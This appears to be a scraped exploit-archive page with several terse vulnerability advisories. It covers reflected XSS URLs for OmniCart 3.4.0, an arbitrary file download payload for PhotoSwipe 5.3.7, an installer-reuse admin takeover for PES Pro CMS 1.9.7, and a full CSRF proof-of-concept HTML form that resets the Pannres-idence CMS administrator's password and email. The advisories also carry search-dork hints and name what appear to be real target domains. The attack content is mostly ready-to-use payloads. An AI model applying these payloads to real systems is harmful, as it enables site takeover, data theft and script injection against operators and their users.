   The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /GET parameter 'lang' is vulnerable to RXSShttps://website/?lang=ar&ms4sp"><script>alert(1)</script>ffj2=1Path: /index.php/searchGET parameter 'search' is vulnerable to RXSShttps://website/index.php/search?search=123&h45te"><script>alert(1)</script>khuqf=1[-] Done

OmniCart 3.4.0 Cross Site Scripting

PhotoSwipe version 5.3.7 suffers from an arbitrary file download vulnerability.

    ===========================================================================================| # Title     : PhotoSwipe 5.3.7 Arbitrary File Download Vulnerability                    || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://photoswipe.com/                                                   |  | # Dork      :                                                                           |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : download?path=/uploads/images/support/download/index.php[+] Payload enables you to download empty files .[+] https://127.0.0.1/novakon.com.tw/common/frontend/download?path=/uploads/images/support/download/index.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

PhotoSwipe 5.3.7 Arbitrary File Download

PES Pro CMS version 1.9.7 suffers from an add administrator vulnerability.

    ====================================================================================================================================| # Title     : PES Pro CMS - v1.9.7 Reinstall add admin Vulnerability                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://download1580.mediafire.com/3e3q3pr2g20g/jt6w98fdfyqk0s1/pes.zip                                             |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : /install/?step=4 =====> http://127.0.0.1/zarabiarapl/install/?step=4[+] Set new user or password .[+] Admin panel : http://zarabiara.pl/admin-panel/index.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |                                                                                                                                      |=======================================================================================================================================

PES Pro CMS 1.9.7 Add Administrator

Pannres-Idence CMS version 7.3 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Pannres-idence CMS 7.3 CSRF Vulnerability                                                                          |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             |   
| # Vendor    : https://codecanyon.net/item/pannresidence-classified-ads-php-script/19960675?s_rank=189                            |    
| # Dork      : "Bylancer, All right reserved"                                                                                     |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html Will modify the password for the site manager, as well as change the e-mail.

[+] save code as poc.html .

<form class="form-horizontal" action="http://127.0.0.1/pannresidencecom/backend/add_newPassword.php" name="form2" id="form2">

                            <fieldset>

                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">NEW PASSWORD</label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="password" id="password" class="form-control" placeholder="Your new password." type="password">  
                                    </div>  
                                </div>

                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">RE NEW PASSWORD<meta></label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="re_password" id="re_password" class="form-control" placeholder="Re password again." type="password" onchange="check_pass()">

                                    </div>  
                                </div>

                                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">CHANGE EMAIL</label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="newEmail" value="" class="form-control" type="email">

                                    </div>  
                                </div>

                                                            </fieldset>

                            <div class="">  
                                <div class="row">  
                                    <div class="col-md-12">  
                                        <button class="btn btn-default" type="clear">  
                                            Cancel  
                                        </button>

                                        <button class="btn btn-primary" id="submit-form" name="submit-form" type="submit">  
                                            <i class="fa fa-save"></i>  
                                            Submit  
                                        </button>  
                                    </div>  
                                </div>  
                            </div>

                        </form>

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

Tag

#php